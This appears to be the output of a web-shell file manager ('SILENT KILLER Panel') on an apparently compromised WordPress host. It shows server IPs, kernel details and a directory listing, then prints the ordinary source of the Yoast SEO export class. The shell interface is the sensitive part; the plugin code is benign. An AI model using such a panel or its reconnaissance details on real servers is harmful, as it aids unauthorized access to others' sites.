SILENT KILLERPanel

Current Path: > home > codekrsu > > escapematrixonline.com > wp-content > plugins > wordpress-seo > admin


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//escapematrixonline.com/wp-content/plugins/wordpress-seo/admin

NameTypeSizeLast ModifiedActions
ajax Directory - -
capabilities Directory - -
endpoints Directory - -
exceptions Directory - -
filters Directory - -
formatter Directory - -
google_search_console Directory - -
import Directory - -
listeners Directory - -
menu Directory - -
metabox Directory - -
notifiers Directory - -
pages Directory - -
roles Directory - -
services Directory - -
statistics Directory - -
taxonomy Directory - -
tracking Directory - -
views Directory - -
watchers Directory - -
admin-settings-changed-listener.php File 2445 bytes January 19 2024 15:31:02.
ajax.php File 11428 bytes April 29 2025 14:26:42.
class-admin-asset-analysis-worker-location.php File 1849 bytes May 18 2021 17:42:44.
class-admin-asset-dev-server-location.php File 1672 bytes January 19 2024 15:31:02.
class-admin-asset-location.php File 488 bytes March 20 2018 20:19:04.
class-admin-asset-manager.php File 20141 bytes July 01 2025 15:54:20.
class-admin-asset-seo-location.php File 2126 bytes October 05 2021 12:07:22.
class-admin-editor-specific-replace-vars.php File 6495 bytes January 19 2024 15:31:02.
class-admin-gutenberg-compatibility-notification.php File 2610 bytes January 19 2024 15:31:02.
class-admin-help-panel.php File 2760 bytes June 30 2020 10:57:44.
class-admin-init.php File 10970 bytes November 05 2024 16:04:06.
class-admin-recommended-replace-vars.php File 6128 bytes January 19 2024 15:31:02.
class-admin-user-profile.php File 3323 bytes August 20 2024 14:37:16.
class-admin-utils.php File 2196 bytes October 03 2023 13:24:42.
class-admin.php File 13032 bytes July 01 2025 15:54:20.
class-asset.php File 4405 bytes October 22 2024 13:45:22.
class-bulk-description-editor-list-table.php File 2100 bytes September 01 2020 16:27:02.
class-bulk-editor-list-table.php File 30113 bytes April 07 2025 13:46:06.
class-bulk-title-editor-list-table.php File 2286 bytes May 26 2020 15:19:38.
class-collector.php File 1005 bytes April 07 2025 13:46:06.
class-config.php File 4998 bytes July 01 2025 15:54:20.
class-database-proxy.php File 7684 bytes April 07 2025 13:46:06.
class-export.php File 3541 bytes January 19 2024 15:31:02.
class-expose-shortlinks.php File 8432 bytes January 07 2025 15:31:18.
class-gutenberg-compatibility.php File 2529 bytes July 10 2025 12:49:38.
class-meta-columns.php File 27955 bytes March 04 2025 16:33:16.
class-my-yoast-proxy.php File 6285 bytes April 07 2025 13:46:06.
class-option-tab.php File 2268 bytes May 30 2022 15:34:46.
class-option-tabs-formatter.php File 2905 bytes January 19 2024 15:31:02.
class-option-tabs.php File 2311 bytes January 19 2024 15:31:02.
class-paper-presenter.php File 3600 bytes May 18 2021 17:42:44.
class-plugin-availability.php File 10304 bytes April 07 2025 13:46:06.
class-plugin-conflict.php File 4141 bytes April 03 2024 15:08:10.
class-premium-popup.php File 2875 bytes April 07 2025 13:46:06.
class-premium-upsell-admin-block.php File 5236 bytes October 02 2024 16:24:42.
class-primary-term-admin.php File 7524 bytes January 19 2024 15:31:02.
class-product-upsell-notice.php File 5886 bytes January 19 2024 15:31:02.
class-remote-request.php File 3203 bytes January 19 2024 15:31:02.
class-schema-person-upgrade-notification.php File 2284 bytes January 19 2024 15:31:02.
class-suggested-plugins.php File 4429 bytes March 19 2024 14:28:52.
class-wincher-dashboard-widget.php File 3615 bytes January 19 2024 15:31:02.
class-yoast-columns.php File 3602 bytes January 19 2024 15:31:02.
class-yoast-dashboard-widget.php File 4055 bytes January 19 2024 15:31:02.
class-yoast-form.php File 36597 bytes April 07 2025 13:46:06.
class-yoast-input-validation.php File 7377 bytes April 07 2025 13:46:06.
class-yoast-network-admin.php File 10208 bytes January 19 2024 15:31:02.
class-yoast-network-settings-api.php File 4281 bytes April 07 2025 13:46:06.
class-yoast-notification-center.php File 26684 bytes April 07 2025 13:46:06.
class-yoast-notification.php File 10059 bytes April 07 2025 13:46:06.
class-yoast-notifications.php File 7812 bytes January 19 2024 15:31:02.
class-yoast-plugin-conflict.php File 10574 bytes April 07 2025 13:46:06.
index.php File 38 bytes July 21 2015 17:37:30.
interface-collection.php File 257 bytes August 28 2018 15:09:12.
interface-installable.php File 254 bytes March 20 2018 20:19:04.

Reading File: /home/codekrsu//escapematrixonline.com/wp-content/plugins/wordpress-seo/admin/class-export.php

<?php
/**
 * WPSEO plugin file.
 *
 * @package WPSEO\Admin\Export
 */

/**
 * Class WPSEO_Export.
 *
 * Class with functionality to export the WP SEO settings.
 */
class WPSEO_Export {

	/**
	 * Holds the nonce action.
	 *
	 * @var string
	 */
	public const NONCE_ACTION = 'wpseo_export';

	/**
	 * Holds the export data.
	 *
	 * @var string
	 */
	private $export = '';

	/**
	 * Holds whether the export was a success.
	 *
	 * @var bool
	 */
	public $success;

	/**
	 * Handles the export request.
	 *
	 * @return void
	 */
	public function export() {
		check_admin_referer( self::NONCE_ACTION );
		$this->export_settings();
		$this->output();
	}

	/**
	 * Outputs the export.
	 *
	 * @return void
	 */
	public function output() {
		if ( ! WPSEO_Capability_Utils::current_user_can( 'wpseo_manage_options' ) ) {
			esc_html_e( 'You do not have the required rights to export settings.', 'wordpress-seo' );
			return;
		}

		echo '<p id="wpseo-settings-export-desc">';
		printf(
			/* translators: %1$s expands to Import settings */
			esc_html__(
				'Copy all these settings to another site\'s %1$s tab and click "%1$s" there.',
				'wordpress-seo'
			),
			esc_html__(
				'Import settings',
				'wordpress-seo'
			)
		);
		echo '</p>';
		/* translators: %1$s expands to Yoast SEO */
		echo '<label for="wpseo-settings-export" class="yoast-inline-label">' . sprintf( __( 'Your %1$s settings:', 'wordpress-seo' ), 'Yoast SEO' ) . '</label><br />';
		echo '<textarea id="wpseo-settings-export" rows="20" cols="100" aria-describedby="wpseo-settings-export-desc">' . esc_textarea( $this->export ) . '</textarea>';
	}

	/**
	 * Exports the current site's WP SEO settings.
	 *
	 * @return void
	 */
	private function export_settings() {
		$this->export_header();

		foreach ( WPSEO_Options::get_option_names() as $opt_group ) {
			$this->write_opt_group( $opt_group );
		}
	}

	/**
	 * Writes the header of the export.
	 *
	 * @return void
	 */
	private function export_header() {
		$header = sprintf(
			/* translators: %1$s expands to Yoast SEO, %2$s expands to Yoast.com */
			esc_html__( 'These are settings for the %1$s plugin by %2$s', 'wordpress-seo' ),
			'Yoast SEO',
			'Yoast.com'
		);
		$this->write_line( '; ' . $header );
	}

	/**
	 * Writes a line to the export.
	 *
	 * @param string $line          Line string.
	 * @param bool   $newline_first Boolean flag whether to prepend with new line.
	 *
	 * @return void
	 */
	private function write_line( $line, $newline_first = false ) {
		if ( $newline_first ) {
			$this->export .= PHP_EOL;
		}
		$this->export .= $line . PHP_EOL;
	}

	/**
	 * Writes an entire option group to the export.
	 *
	 * @param string $opt_group Option group name.
	 *
	 * @return void
	 */
	private function write_opt_group( $opt_group ) {

		$this->write_line( '[' . $opt_group . ']', true );

		$options = get_option( $opt_group );

		if ( ! is_array( $options ) ) {
			return;
		}

		foreach ( $options as $key => $elem ) {
			if ( is_array( $elem ) ) {
				$count = count( $elem );
				for ( $i = 0; $i < $count; $i++ ) {
					$elem_check = ( $elem[ $i ] ?? null );
					$this->write_setting( $key . '[]', $elem_check );
				}
			}
			else {
				$this->write_setting( $key, $elem );
			}
		}
	}

	/**
	 * Writes a settings line to the export.
	 *
	 * @param string $key Key string.
	 * @param string $val Value string.
	 *
	 * @return void
	 */
	private function write_setting( $key, $val ) {
		if ( is_string( $val ) ) {
			$val = '"' . $val . '"';
		}
		$this->write_line( $key . ' = ' . $val );
	}
}

SILENT KILLER Tool